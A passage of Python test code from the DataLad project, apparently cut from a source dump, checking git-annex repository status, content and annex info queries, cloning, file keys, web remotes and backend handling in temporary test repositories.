assert_in(status[p]['type'], ('dataset', 'directory'), p)\n else:\n assert_in(status[p]['type'], ('file', 'symlink'), p)\n\n # git annex status integrity\n annexstatus = get_annexstatus(ds.repo)\n for t in ('file',):\n for s in ('untracked', 'added', 'deleted', 'clean',\n 'ingit_clean', 'dropped_clean', 'modified',\n 'ingit_modified'):\n for l in ('', ut.PurePosixPath('subdir', '')):\n p = repopath.joinpath(l, '{}_{}'.format(t, s))\n if s in ('untracked', 'ingit_clean', 'ingit_modified'):\n # annex knows nothing about these things\n assert_not_in('key', annexstatus[p])\n continue\n assert_in('key', annexstatus[p])\n # dear future,\n # if the next one fails, git-annex might have changed the\n # nature of the path that are being reported by\n # `annex find --json`\n # when this was written `hashir*` was a native path, but\n # `file` was a POSIX path\n assert_equal(annexstatus[p]['has_content'], 'dropped' not in s)\n\n # check the different subds evaluation modes\n someds = Dataset(ds.pathobj / 'subds_modified' / 'someds')\n dirtyds_path = someds.pathobj / 'dirtyds'\n assert_not_in(\n 'state',\n someds.repo.status(eval_submodule_state='no')[dirtyds_path]\n )\n assert_equal(\n 'clean',\n someds.repo.status(eval_submodule_state='commit')[dirtyds_path]['state']\n )\n assert_equal(\n 'modified',\n someds.repo.status(eval_submodule_state='full')[dirtyds_path]['state']\n )\n\n\n\n@with_tempfile\ndef test_compare_content_info(path=None):\n # TODO remove when `create` is RF to return the new Dataset\n ds = Dataset(path).create()\n assert_repo_status(path)\n\n # for a clean repo HEAD and worktree query should yield identical results\n # minus a 'bytesize' report that is readily available for HEAD, but would\n # not a stat call per file for the worktree, and is not done ATM\n wt = ds.repo.get_content_info(ref=None)\n assert_dict_equal(\n wt,\n {f: {k: v for k, v in p.items() if k != 'bytesize'}\n for f, p in ds.repo.get_content_info(ref='HEAD').items()}\n )\n\n\n@with_tempfile\ndef test_subds_path(path=None):\n # a dataset with a subdataset with a file, all neatly tracked\n ds = Dataset(path).create()\n subds = ds.create('sub')\n assert_repo_status(path)\n with (subds.pathobj / 'some.txt').open('w') as f:\n f.write(u'test')\n ds.save(recursive=True)\n assert_repo_status(path)\n\n # querying the toplevel dataset repo for a subdspath should\n # report the subdataset record in the dataset\n # (unlike `git status`, which is silent for subdataset paths),\n # but definitely not report the subdataset as deleted\n # https://github.com/datalad/datalad-revolution/issues/17\n stat = ds.repo.status(paths=[op.join('sub', 'some.txt')])\n assert_equal(list(stat.keys()), [subds.repo.pathobj])\n assert_equal(stat[subds.repo.pathobj]['state'], 'clean')\n\n\n@skip_if(on_travis and on_nfs) # TODO. stalls https://github.com/datalad/datalad/pull/7372\n@with_tempfile\ndef test_report_absent_keys(path=None):\n ds = Dataset(path).create()\n # create an annexed file\n testfile = ds.pathobj / 'dummy'\n testfile.write_text(u'nothing')\n ds.save()\n # present in a full report and in a partial report\n # based on worktree of HEAD ref\n for ai in (\n ds.repo.get_content_annexinfo(eval_availability=True),\n ds.repo.get_content_annexinfo(\n paths=['dummy'],\n eval_availability=True),\n ds.repo.get_content_annexinfo(\n ref='HEAD',\n eval_availability=True),\n ds.repo.get_content_annexinfo(\n ref='HEAD',\n paths=['dummy'],\n eval_availability=True)):\n assert_in(testfile, ai)\n assert_equal(ai[testfile]['has_content'], True)\n # drop the key, not available anywhere else\n ds.drop('dummy', reckless='kill')\n # does not change a thing, except the key is gone\n for ai in (\n ds.repo.get_content_annexinfo(eval_availability=True),\n ds.repo.get_content_annexinfo(\n paths=['dummy'],\n eval_availability=True),\n ds.repo.get_content_annexinfo(\n ref='HEAD',\n eval_availability=True),\n ds.repo.get_content_annexinfo(\n ref='HEAD',\n paths=['dummy'],\n eval_availability=True)):\n assert_in(testfile, ai)\n assert_equal(ai[testfile]['has_content'], False)\n # make sure files with URL keys are correctly reported:\n from datalad.conftest import test_http_server\n remote_file_name = 'imaremotefile.dat'\n local_file_name = 'mehasurlkey'\n (Path(test_http_server.path) / remote_file_name).write_text(\"weee\")\n remote_file_url = f'{test_http_server.url}/{remote_file_name}'\n # we need to get a file with a URL key and check its local availability\n ds.repo.call_annex(['addurl', '--relaxed', remote_file_url, '--file',\n local_file_name])\n ds.save(\"URL keys!\")\n # should not be there\n res = ds.repo.get_file_annexinfo(local_file_name, eval_availability=True)\n assert_equal(res['has_content'], False)\n ds.get(local_file_name)\n # should be there\n res = ds.repo.get_file_annexinfo(local_file_name, eval_availability=True)\n assert_equal(res['has_content'], True)\n\n\n@with_tempfile\ndef test_annexinfo_init(path=None):\n ds = Dataset(path).create()\n foo = ds.pathobj / \"foo\"\n foo_cont = b\"foo content\"\n foo.write_bytes(foo_cont)\n bar = ds.pathobj / \"bar\"\n bar.write_text(u\"bar content\")\n ds.save()\n\n # Custom init limits report, with original dict getting updated.\n cinfo_custom_init = ds.repo.get_content_annexinfo(\n init={foo: {\"bytesize\": 0,\n \"this-is-surely-only-here\": \"right?\"}})\n assert_not_in(bar, cinfo_custom_init)\n assert_in(foo, cinfo_custom_init)\n assert_equal(cinfo_custom_init[foo][\"bytesize\"], len(foo_cont))\n assert_equal(cinfo_custom_init[foo][\"this-is-surely-only-here\"],\n \"right?\")\n\n # \"git\" injects get_content_info() values.\n cinfo_init_git = ds.repo.get_content_annexinfo(init=\"git\")\n assert_in(\"gitshasum\", cinfo_init_git[foo])\n\n # init=None, on the other hand, does not.\n cinfo_init_none = ds.repo.get_content_annexinfo(init=None)\n assert_in(foo, cinfo_init_none)\n assert_in(bar, cinfo_init_none)\n assert_not_in(\"gitshasum\", cinfo_init_none[foo])\n\n\n@with_tempfile\ndef test_info_path_inside_submodule(path=None):\n ds = Dataset(path).create()\n subds = ds.create(\"submod\")\n foo = (subds.pathobj / \"foo\")\n foo.write_text(\"foo\")\n ds.save(recursive=True)\n cinfo = ds.repo.get_content_info(\n ref=\"HEAD\", paths=[foo.relative_to(ds.pathobj)])\n assert_in(\"gitshasum\", cinfo[subds.pathobj])\n\n\n@with_tempfile\ndef test_get_content_info_dotgit(path=None):\n ds = Dataset(path).create()\n # Files in .git/ won't be reported, though this takes a kludge on our side\n # before Git 2.25.\n assert_false(ds.repo.get_content_info(paths=[op.join(\".git\", \"config\")]))\n\n\n@with_tempfile\ndef test_get_content_info_paths_empty_list(path=None):\n ds = Dataset(path).create()\n\n # Unlike None, passing any empty list as paths to get_content_info() does\n # not report on all content.\n assert_false(ds.repo.get_content_info(paths=[]))\n assert_false(ds.repo.get_content_info(paths=[], ref=\"HEAD\"))\n\n # Add annex content to make sure its not reported.\n (ds.pathobj / \"foo\").write_text(\"foo\")\n ds.save()\n\n # Same for get_content_annexinfo()...\n assert_false(ds.repo.get_content_annexinfo(paths=[]))\n assert_false(ds.repo.get_content_annexinfo(paths=[], init=None))\n assert_false(ds.repo.get_content_annexinfo(paths=[], ref=\"HEAD\"))\n assert_false(\n ds.repo.get_content_annexinfo(paths=[], ref=\"HEAD\", init=None))\n # ... where whatever was passed for init will be returned as is.\n assert_equal(\n ds.repo.get_content_annexinfo(\n paths=[], ref=\"HEAD\", init={\"random\": {\"entry\": \"a\"}}),\n {\"random\": {\"entry\": \"a\"}})\n\n\n@with_tempfile\ndef test_status_paths_empty_list(path=None):\n ds = Dataset(path).create()\n assert_equal(ds.repo.status(paths=[]), {})\n\n\n@with_tree(tree=(('ingit.txt', 'ingit'),\n ('inannex.txt', 'inannex'),\n ('dir1', {'dropped': 'dropped'}),\n ('dir2', {'d21': 'd21', 'd22': 'd22'})))\ndef test_get_file_annexinfo(path=None):\n ds = Dataset(path).create(force=True)\n ds.save('ingit.txt', to_git=True)\n ds.save()\n # have some content-less component for testing\n ds.drop(ds.pathobj / 'dir1', reckless='kill')\n\n repo = ds.repo\n # only handles a single file at a time\n assert_raises(ValueError, repo.get_file_annexinfo, repo.pathobj / 'dir2')\n # however, it only functionally matters that there is only a single file to\n # report on not that the exact query path matches, the matching path is in\n # the report\n assert_equal(\n repo.pathobj / 'dir1' / 'dropped',\n repo.get_file_annexinfo(repo.pathobj / 'dir1')['path'])\n\n # does not raise on a non-annex file, instead it returns no properties\n assert_equal(repo.get_file_annexinfo('ingit.txt'), {})\n\n # but does raise on path that doesn exist\n assert_raises(NoSuchPathError, repo.get_file_annexinfo, 'nothere')\n\n # check return properties for utility\n props = repo.get_file_annexinfo('inannex.txt')\n # to replace get_file_backend()\n assert_equal(props['backend'], 'MD5E')\n # to replace get_file_key()\n assert_equal(props['key'], 'MD5E-s7--3b158c5b0a18c247ebad28c09fc3e180.txt')\n # for size reporting\n assert_equal(props['bytesize'], 7)\n # all records have a pathobj\n assert_equal(props['path'], repo.pathobj / 'inannex.txt')\n # test if `eval_availability` has desired effect\n assert_not_in('has_content', props)\n\n # extended set of properties, after more expensive availability check\n props = repo.get_file_annexinfo('inannex.txt', eval_availability=True)\n # to replace file_has_content()\n assert_equal(props['has_content'], True)\n # to replace get_contentlocation()\n assert_equal(\n Path(props['objloc']).read_text(),\n 'inannex')\n\n # make sure has_content is not always True\n props = repo.get_file_annexinfo(\n ds.pathobj / 'dir1' / 'dropped', eval_availability=True)\n assert_equal(props['has_content'], False)\n assert_not_in('objloc', props)\n" }, { "alpha_fraction": 0.6220777034759521, "alphanum_fraction": 0.6345899701118469, "avg_line_length": 34.929969787597656, "blob_id": "605fef2763039c9ebec64a1401fd38c71004f434", "content_id": "df5c9b60bef06836f6e74f880612a6babeab582f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 99023, "license_type": "permissive", "max_line_length": 194, "num_lines": 2756, "path": "/datalad/support/tests/test_annexrepo.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test implementation of class AnnexRepo\n\n\"\"\"\n\nimport gc\nimport json\nimport logging\nimport os\nimport re\nimport sys\nimport unittest.mock\nfrom functools import partial\nfrom glob import glob\nfrom os import mkdir\nfrom os.path import (\n basename,\n curdir,\n exists,\n)\nfrom os.path import join as opj\nfrom os.path import (\n pardir,\n relpath,\n)\nfrom queue import Queue\nfrom shutil import copyfile\nfrom unittest.mock import patch\nfrom urllib.parse import (\n urljoin,\n urlsplit,\n)\n\nimport pytest\n\nfrom datalad import cfg as dl_cfg\nfrom datalad.api import clone\nfrom datalad.cmd import GitWitlessRunner\nfrom datalad.cmd import WitlessRunner as Runner\nfrom datalad.consts import (\n DATALAD_SPECIAL_REMOTE,\n DATALAD_SPECIAL_REMOTES_UUIDS,\n WEB_SPECIAL_REMOTE_UUID,\n)\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.runner.gitrunner import GitWitlessRunner\nfrom datalad.support import path as op\n# imports from same module:\nfrom datalad.support.annexrepo import (\n AnnexJsonProtocol,\n AnnexRepo,\n GeneratorAnnexJsonNoStderrProtocol,\n GeneratorAnnexJsonProtocol,\n)\nfrom datalad.support.exceptions import (\n AnnexBatchCommandError,\n CommandError,\n FileInGitError,\n FileNotInAnnexError,\n FileNotInRepositoryError,\n IncompleteResultsError,\n InsufficientArgumentsError,\n MissingExternalDependency,\n OutdatedExternalDependency,\n OutOfSpaceError,\n RemoteNotAvailableError,\n)\nfrom datalad.support.external_versions import external_versions\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.support.sshconnector import get_connection_hash\nfrom datalad.tests.utils_pytest import (\n DEFAULT_BRANCH,\n DEFAULT_REMOTE,\n OBSCURE_FILENAME,\n SkipTest,\n assert_cwd_unchanged,\n)\nfrom datalad.tests.utils_pytest import assert_dict_equal as deq_\nfrom datalad.tests.utils_pytest import (\n assert_equal,\n assert_false,\n assert_in,\n assert_is_instance,\n assert_not_equal,\n assert_not_in,\n assert_not_is_instance,\n assert_raises,\n assert_re_in,\n assert_repo_status,\n assert_result_count,\n assert_true,\n create_tree,\n eq_,\n find_files,\n get_most_obscure_supported_name,\n known_failure_githubci_win,\n known_failure_windows,\n maybe_adjust_repo,\n ok_,\n ok_annex_get,\n ok_file_has_content,\n ok_file_under_git,\n ok_git_config_not_empty,\n on_nfs,\n on_travis,\n serve_path_via_http,\n set_annex_version,\n skip_if,\n skip_if_adjusted_branch,\n skip_if_on_windows,\n skip_if_root,\n skip_nomultiplex_ssh,\n slow,\n swallow_logs,\n swallow_outputs,\n with_parametric_batch,\n with_sameas_remote,\n with_tempfile,\n with_tree,\n xfail_buggy_annex_info,\n)\nfrom datalad.utils import (\n Path,\n chpwd,\n get_linux_distribution,\n on_windows,\n quote_cmdlinearg,\n rmtree,\n unlink,\n)\n\n\n_GIT_ANNEX_VERSIONS_INFO = AnnexRepo.check_repository_versions()\n\n\n@assert_cwd_unchanged\n@with_tempfile\n@with_tempfile\ndef test_AnnexRepo_instance_from_clone(src=None, dst=None):\n\n origin = AnnexRepo(src, create=True)\n ar = AnnexRepo.clone(src, dst)\n assert_is_instance(ar, AnnexRepo, \"AnnexRepo was not created.\")\n ok_(os.path.exists(os.path.join(dst, '.git', 'annex')))\n\n # do it again should raise ValueError since git will notice\n # there's already a git-repo at that path and therefore can't clone to `dst`\n with swallow_logs(new_level=logging.WARN) as cm:\n assert_raises(ValueError, AnnexRepo.clone, src, dst)\n\n\n@assert_cwd_unchanged\n@with_tempfile\ndef test_AnnexRepo_instance_from_existing(path=None):\n AnnexRepo(path, create=True)\n\n ar = AnnexRepo(path)\n assert_is_instance(ar, AnnexRepo, \"AnnexRepo was not created.\")\n ok_(os.path.exists(os.path.join(path, '.git')))\n\n\n@assert_cwd_unchanged\n@with_tempfile\ndef test_AnnexRepo_instance_brand_new(path=None):\n\n GitRepo(path)\n assert_raises(RuntimeError, AnnexRepo, path, create=False)\n\n ar = AnnexRepo(path)\n assert_is_instance(ar, AnnexRepo, \"AnnexRepo was not created.\")\n ok_(os.path.exists(os.path.join(path, '.git')))\n\n\n@assert_cwd_unchanged\n@with_tempfile\ndef test_AnnexRepo_crippled_filesystem(dst=None):\n\n ar = AnnexRepo(dst)\n\n # fake git-annex entries in .git/config:\n ar.config.set(\n \"annex.crippledfilesystem\",\n 'true',\n scope='local')\n ok_(ar.is_crippled_fs())\n ar.config.set(\n \"annex.crippledfilesystem\",\n 'false',\n scope='local')\n assert_false(ar.is_crippled_fs())\n # since we can't remove the entry, just rename it to fake its absence:\n ar.config.rename_section(\"annex\", \"removed\", scope='local')\n ar.config.set(\"annex.something\", \"value\", scope='local')\n assert_false(ar.is_crippled_fs())\n\n\n@known_failure_githubci_win\n@with_tempfile\n@assert_cwd_unchanged\ndef test_AnnexRepo_is_direct_mode(path=None):\n\n ar = AnnexRepo(path)\n eq_(ar.config.getbool(\"annex\", \"direct\", False),\n ar.is_direct_mode())\n\n\n@known_failure_githubci_win\n@with_tempfile()\ndef test_AnnexRepo_is_direct_mode_gitrepo(path=None):\n repo = GitRepo(path, create=True)\n # artificially make .git/annex so no annex section gets initialized\n # in .git/config. We did manage somehow to make this happen (via publish)\n # but didn't reproduce yet, so just creating manually\n mkdir(opj(repo.path, '.git', 'annex'))\n ar = AnnexRepo(path, init=False, create=False)\n # It is unlikely though that annex would be in direct mode (requires explicit)\n # annex magic, without having annex section under .git/config\n dm = ar.is_direct_mode()\n # no direct mode, ever\n assert_false(dm)\n\n\n# ignore warning since we are testing that function here. Remove upon full deprecation\[email protected](r\"ignore: AnnexRepo.get_file_key\\(\\) is deprecated\")\n@assert_cwd_unchanged\n@with_tempfile\ndef test_AnnexRepo_get_file_key(annex_path=None):\n\n ar = AnnexRepo(annex_path)\n (ar.pathobj / 'test.dat').write_text('123\\n')\n ar.save('test.dat', git=True)\n (ar.pathobj / 'test-annex.dat').write_text(\n \"content to be annex-addurl'd\")\n ar.save('some')\n\n # test-annex.dat should return the correct key:\n test_annex_key = \\\n 'SHA256E-s28' \\\n '--2795fb26981c5a687b9bf44930cc220029223f472cea0f0b17274f4473181e7b.dat'\n eq_(ar.get_file_key(\"test-annex.dat\"), test_annex_key)\n\n # and should take a list with an empty string as result, if a file wasn't\n # in annex:\n eq_(\n ar.get_file_key([\"filenotpresent.wtf\", \"test-annex.dat\"]),\n ['', test_annex_key]\n )\n\n # test.dat is actually in git\n # should raise Exception; also test for polymorphism\n assert_raises(IOError, ar.get_file_key, \"test.dat\")\n assert_raises(FileNotInAnnexError, ar.get_file_key, \"test.dat\")\n assert_raises(FileInGitError, ar.get_file_key, \"test.dat\")\n\n # filenotpresent.wtf doesn't even exist\n assert_raises(IOError, ar.get_file_key, \"filenotpresent.wtf\")\n\n # if we force batch mode, no failure for not present or not annexed files\n eq_(ar.get_file_key(\"filenotpresent.wtf\", batch=True), '')\n eq_(ar.get_file_key(\"test.dat\", batch=True), '')\n eq_(ar.get_file_key(\"test-annex.dat\", batch=True), test_annex_key)\n\n\n@with_tempfile(mkdir=True)\ndef test_AnnexRepo_get_outofspace(annex_path=None):\n ar = AnnexRepo(annex_path, create=True)\n\n def raise_cmderror(*args, **kwargs):\n raise CommandError(\n cmd=\"whatever\",\n stderr=\"junk around not enough free space, need 905.6 MB more and after\"\n )\n\n with patch.object(GitWitlessRunner, 'run_on_filelist_chunks', raise_cmderror) as cma, \\\n assert_raises(OutOfSpaceError) as cme:\n ar.get(\"file\")\n exc = cme.value\n eq_(exc.sizemore_msg, '905.6 MB')\n assert_re_in(\".*annex.*(find|get).*needs 905.6 MB more\", str(exc), re.DOTALL)\n\n\n@with_tempfile\n@with_tempfile\ndef test_AnnexRepo_get_remote_na(src=None, path=None):\n origin = AnnexRepo(src, create=True)\n (origin.pathobj / 'test-annex.dat').write_text(\"content\")\n origin.save()\n ar = AnnexRepo.clone(src, path)\n\n with assert_raises(RemoteNotAvailableError) as cme:\n ar.get('test-annex.dat', options=[\"--from=NotExistingRemote\"])\n eq_(cme.value.remote, \"NotExistingRemote\")\n\n # and similar one whenever invoking with remote parameter\n with assert_raises(RemoteNotAvailableError) as cme:\n ar.get('test-annex.dat', remote=\"NotExistingRemote\")\n eq_(cme.value.remote, \"NotExistingRemote\")\n\n\n@with_sameas_remote\ndef test_annex_repo_sameas_special(repo=None):\n remotes = repo.get_special_remotes()\n eq_(len(remotes), 2)\n rsync_info = [v for v in remotes.values()\n if v.get(\"sameas-name\") == \"r_rsync\"]\n eq_(len(rsync_info), 1)\n # r_rsync is a sameas remote that points to r_dir. Its sameas-name value\n # has been copied under \"name\".\n eq_(rsync_info[0][\"name\"], rsync_info[0][\"sameas-name\"])\n\n\n# 1 is enough to test file_has_content\n@with_parametric_batch\n@with_tempfile\n@with_tempfile\ndef test_AnnexRepo_file_has_content(src=None, annex_path=None, *, batch):\n origin = AnnexRepo(src)\n (origin.pathobj / 'test.dat').write_text('123\\n')\n origin.save('test.dat', git=True)\n (origin.pathobj / 'test-annex.dat').write_text(\"content\")\n origin.save('some')\n ar = AnnexRepo.clone(src, annex_path)\n testfiles = [\"test-annex.dat\", \"test.dat\"]\n\n eq_(ar.file_has_content(testfiles), [False, False])\n\n ok_annex_get(ar, \"test-annex.dat\")\n eq_(ar.file_has_content(testfiles, batch=batch), [True, False])\n eq_(ar.file_has_content(testfiles[:1], batch=batch), [True])\n\n eq_(ar.file_has_content(testfiles + [\"bogus.txt\"], batch=batch),\n [True, False, False])\n\n assert_false(ar.file_has_content(\"bogus.txt\", batch=batch))\n ok_(ar.file_has_content(\"test-annex.dat\", batch=batch))\n\n ar.unlock([\"test-annex.dat\"])\n eq_(ar.file_has_content([\"test-annex.dat\"], batch=batch),\n [True])\n with open(opj(annex_path, \"test-annex.dat\"), \"a\") as ofh:\n ofh.write(\"more\")\n eq_(ar.file_has_content([\"test-annex.dat\"], batch=batch),\n [False])\n\n\n# 1 is enough to test\n@xfail_buggy_annex_info\n@with_parametric_batch\n@with_tempfile\n@with_tempfile\ndef test_AnnexRepo_is_under_annex(src=None, annex_path=None, *, batch):\n origin = AnnexRepo(src)\n (origin.pathobj / 'test-annex.dat').write_text(\"content\")\n origin.save('some')\n ar = AnnexRepo.clone(src, annex_path)\n\n with open(opj(annex_path, 'not-committed.txt'), 'w') as f:\n f.write(\"aaa\")\n\n testfiles = [\"test-annex.dat\", \"not-committed.txt\", \"INFO.txt\"]\n # wouldn't change\n target_value = [True, False, False]\n eq_(ar.is_under_annex(testfiles, batch=batch), target_value)\n\n ok_annex_get(ar, \"test-annex.dat\")\n eq_(ar.is_under_annex(testfiles, batch=batch), target_value)\n eq_(ar.is_under_annex(testfiles[:1], batch=batch), target_value[:1])\n eq_(ar.is_under_annex(testfiles[1:], batch=batch), target_value[1:])\n\n eq_(ar.is_under_annex(testfiles + [\"bogus.txt\"], batch=batch),\n target_value + [False])\n\n assert_false(ar.is_under_annex(\"bogus.txt\", batch=batch))\n ok_(ar.is_under_annex(\"test-annex.dat\", batch=batch))\n\n ar.unlock([\"test-annex.dat\"])\n eq_(ar.is_under_annex([\"test-annex.dat\"], batch=batch),\n [True])\n with open(opj(annex_path, \"test-annex.dat\"), \"a\") as ofh:\n ofh.write(\"more\")\n eq_(ar.is_under_annex([\"test-annex.dat\"], batch=batch),\n [False])\n\n\n@xfail_buggy_annex_info\n@with_tree(tree=(('about.txt', 'Lots of abouts'),\n ('about2.txt', 'more abouts'),\n ('d', {'sub.txt': 'more stuff'})))\n@serve_path_via_http()\n@with_tempfile\ndef test_AnnexRepo_web_remote(sitepath=None, siteurl=None, dst=None):\n\n ar = AnnexRepo(dst, create=True)\n testurl = urljoin(siteurl, 'about.txt')\n testurl2 = urljoin(siteurl, 'about2.txt')\n testurl3 = urljoin(siteurl, 'd/sub.txt')\n url_file_prefix = urlsplit(testurl).netloc.split(':')[0]\n testfile = '%s_about.txt' % url_file_prefix\n testfile2 = '%s_about2.txt' % url_file_prefix\n testfile3 = opj('d', 'sub.txt')\n\n # get the file from remote\n with swallow_outputs() as cmo:\n ar.add_url_to_file(testfile, testurl)\n l = ar.whereis(testfile)\n assert_in(WEB_SPECIAL_REMOTE_UUID, l)\n eq_(len(l), 2)\n ok_(ar.file_has_content(testfile))\n\n # output='full'\n lfull = ar.whereis(testfile, output='full')\n eq_(set(lfull), set(l)) # the same entries\n non_web_remote = l[1 - l.index(WEB_SPECIAL_REMOTE_UUID)]\n assert_in('urls', lfull[non_web_remote])\n eq_(lfull[non_web_remote]['urls'], [])\n assert_not_in('uuid', lfull[WEB_SPECIAL_REMOTE_UUID]) # no uuid in the records\n eq_(lfull[WEB_SPECIAL_REMOTE_UUID]['urls'], [testurl])\n assert_equal(lfull[WEB_SPECIAL_REMOTE_UUID]['description'], 'web')\n\n # --all and --key are incompatible\n assert_raises(CommandError, ar.whereis, [testfile], options='--all', output='full', key=True)\n\n # output='descriptions'\n ldesc = ar.whereis(testfile, output='descriptions')\n eq_(set(ldesc), set([v['description'] for v in lfull.values()]))\n\n # info w/ and w/o fast mode\n for fast in [True, False]:\n info = ar.info(testfile, fast=fast)\n eq_(info['size'], 14)\n assert(info['key']) # that it is there\n info_batched = ar.info(testfile, batch=True, fast=fast)\n eq_(info, info_batched)\n # while at it ;)\n with swallow_outputs() as cmo:\n eq_(ar.info('nonexistent', batch=False), None)\n eq_(ar.info('nonexistent-batch', batch=True), None)\n eq_(cmo.out, '')\n eq_(cmo.err, '')\n ar.precommit() # to stop all the batched processes for swallow_outputs\n\n # annex repo info\n repo_info = ar.repo_info(fast=False)\n eq_(repo_info['local annex size'], 14)\n eq_(repo_info['backend usage'], {'SHA256E': 1})\n # annex repo info in fast mode\n repo_info_fast = ar.repo_info(fast=True)\n # doesn't give much testable info, so just comparing a subset for match with repo_info info\n eq_(repo_info_fast['semitrusted repositories'], repo_info['semitrusted repositories'])\n #import pprint; pprint.pprint(repo_info)\n\n # remove the remote\n ar.rm_url(testfile, testurl)\n l = ar.whereis(testfile)\n assert_not_in(WEB_SPECIAL_REMOTE_UUID, l)\n eq_(len(l), 1)\n\n # now only 1 copy; drop should fail\n try:\n res = ar.drop(testfile)\n except CommandError as e:\n # there should be at least one result that was captured\n # TODO think about a more standard way of accessing such\n # records in a CommandError, maybe having a more specialized\n # exception derived from CommandError\n res = e.kwargs['stdout_json'][0]\n eq_(res['command'], 'drop')\n eq_(res['success'], False)\n assert_in('adjust numcopies', res['note'])\n\n # read the url using different method\n ar.add_url_to_file(testfile, testurl)\n l = ar.whereis(testfile)\n assert_in(WEB_SPECIAL_REMOTE_UUID, l)\n eq_(len(l), 2)\n ok_(ar.file_has_content(testfile))\n\n # 2 known copies now; drop should succeed\n ar.drop(testfile)\n l = ar.whereis(testfile)\n assert_in(WEB_SPECIAL_REMOTE_UUID, l)\n eq_(len(l), 1)\n assert_false(ar.file_has_content(testfile))\n lfull = ar.whereis(testfile, output='full')\n assert_not_in(non_web_remote, lfull) # not present -- so not even listed\n\n # multiple files/urls\n # get the file from remote\n with swallow_outputs() as cmo:\n ar.add_url_to_file(testfile2, testurl2)\n\n # TODO: if we ask for whereis on all files, we should get for all files\n lall = ar.whereis('.')\n eq_(len(lall), 2)\n for e in lall:\n assert(isinstance(e, list))\n # but we don't know which one for which file. need a 'full' one for that\n lall_full = ar.whereis('.', output='full')\n ok_(ar.file_has_content(testfile2))\n ok_(lall_full[testfile2][non_web_remote]['here'])\n eq_(set(lall_full), {testfile, testfile2})\n\n # add a bogus 2nd url to testfile\n\n someurl = \"http://example.com/someurl\"\n ar.add_url_to_file(testfile, someurl, options=['--relaxed'])\n lfull = ar.whereis(testfile, output='full')\n eq_(set(lfull[WEB_SPECIAL_REMOTE_UUID]['urls']), {testurl, someurl})\n\n # and now test with a file in subdirectory\n subdir = opj(dst, 'd')\n os.mkdir(subdir)\n with swallow_outputs() as cmo:\n ar.add_url_to_file(testfile3, url=testurl3)\n ok_file_has_content(opj(dst, testfile3), 'more stuff')\n eq_(set(ar.whereis(testfile3)), {WEB_SPECIAL_REMOTE_UUID, non_web_remote})\n eq_(set(ar.whereis(testfile3, output='full').keys()), {WEB_SPECIAL_REMOTE_UUID, non_web_remote})\n\n # and if we ask for both files\n info2 = ar.info([testfile, testfile3])\n eq_(set(info2), {testfile, testfile3})\n eq_(info2[testfile3]['size'], 10)\n\n full = ar.whereis([], options='--all', output='full')\n eq_(len(full.keys()), 3) # we asked for all files -- got 3 keys\n assert_in(WEB_SPECIAL_REMOTE_UUID, full['SHA256E-s10--a978713ea759207f7a6f9ebc9eaebd1b40a69ae408410ddf544463f6d33a30e1.txt'])\n\n # which would work even if we cd to that subdir, but then we should use explicit curdir\n with chpwd(subdir):\n cur_subfile = opj(curdir, 'sub.txt')\n eq_(set(ar.whereis(cur_subfile)), {WEB_SPECIAL_REMOTE_UUID, non_web_remote})\n eq_(set(ar.whereis(cur_subfile, output='full').keys()), {WEB_SPECIAL_REMOTE_UUID, non_web_remote})\n testfiles = [cur_subfile, opj(pardir, testfile)]\n info2_ = ar.info(testfiles)\n # Should maintain original relative file names\n eq_(set(info2_), set(testfiles))\n eq_(info2_[cur_subfile]['size'], 10)\n\n\n@with_tree(tree={\"a.txt\": \"a\",\n \"b\": \"b\",\n OBSCURE_FILENAME: \"c\",\n \"subdir\": {\"d\": \"d\", \"e\": \"e\"}})\ndef test_find_batch_equivalence(path=None):\n ar = AnnexRepo(path)\n files = [\"a.txt\", \"b\", OBSCURE_FILENAME]\n ar.add(files + [\"subdir\"])\n ar.commit(\"add files\")\n query = [\"not-there\"] + files\n expected = {f: f for f in files}\n expected.update({\"not-there\": \"\"})\n eq_(expected, ar.find(query, batch=True))\n eq_(expected, ar.find(query))\n # If we give a subdirectory, we split that output.\n eq_(set(ar.find([\"subdir\"])[\"subdir\"]), {\"subdir/d\", \"subdir/e\"})\n eq_(ar.find([\"subdir\"]), ar.find([\"subdir\"], batch=True))\n # manually ensure that no annex batch processes are around anymore\n # that make the test cleanup break on windows.\n # story at https://github.com/datalad/datalad/issues/4190\n # even an explicit `del ar` does not get it done\n ar._batched.close()\n\n\n@with_tempfile(mkdir=True)\ndef test_repo_info(path=None):\n repo = AnnexRepo(path)\n info = repo.repo_info() # works in empty repo without crashing\n eq_(info['local annex size'], 0)\n eq_(info['size of annexed files in working tree'], 0)\n\n def get_custom(custom={}):\n \"\"\"Need a helper since repo_info modifies in place so we should generate\n new each time\n \"\"\"\n custom_json = {\n 'available local disk space': 'unknown',\n 'size of annexed files in working tree': \"0\",\n 'success': True,\n 'command': 'info',\n }\n if custom:\n custom_json.update(custom)\n return [custom_json]\n\n with patch.object(\n repo, '_call_annex_records',\n return_value=get_custom()):\n info = repo.repo_info()\n eq_(info['available local disk space'], None)\n\n with patch.object(\n repo, '_call_annex_records',\n return_value=get_custom({\n \"available local disk space\": \"19193986496 (+100000 reserved)\"})):\n info = repo.repo_info()\n eq_(info['available local disk space'], 19193986496)\n\n\n@with_tempfile\n@with_tempfile\ndef test_AnnexRepo_migrating_backends(src=None, dst=None):\n origin = AnnexRepo(src)\n (origin.pathobj / 'test-annex.dat').write_text(\"content\")\n origin.save('some')\n ar = AnnexRepo.clone(src, dst, backend='MD5')\n eq_(ar.default_backends, ['MD5'])\n # GitPython has a bug which causes .git/config being wiped out\n # under Python3, triggered by collecting its config instance I guess\n gc.collect()\n ok_git_config_not_empty(ar) # Must not blow, see https://github.com/gitpython-developers/GitPython/issues/333\n\n filename = get_most_obscure_supported_name()\n filename_abs = os.path.join(dst, filename)\n f = open(filename_abs, 'w')\n f.write(\"What to write?\")\n f.close()\n\n ar.add(filename, backend='MD5')\n eq_(ar.get_file_backend(filename), 'MD5')\n eq_(ar.get_file_backend('test-annex.dat'), 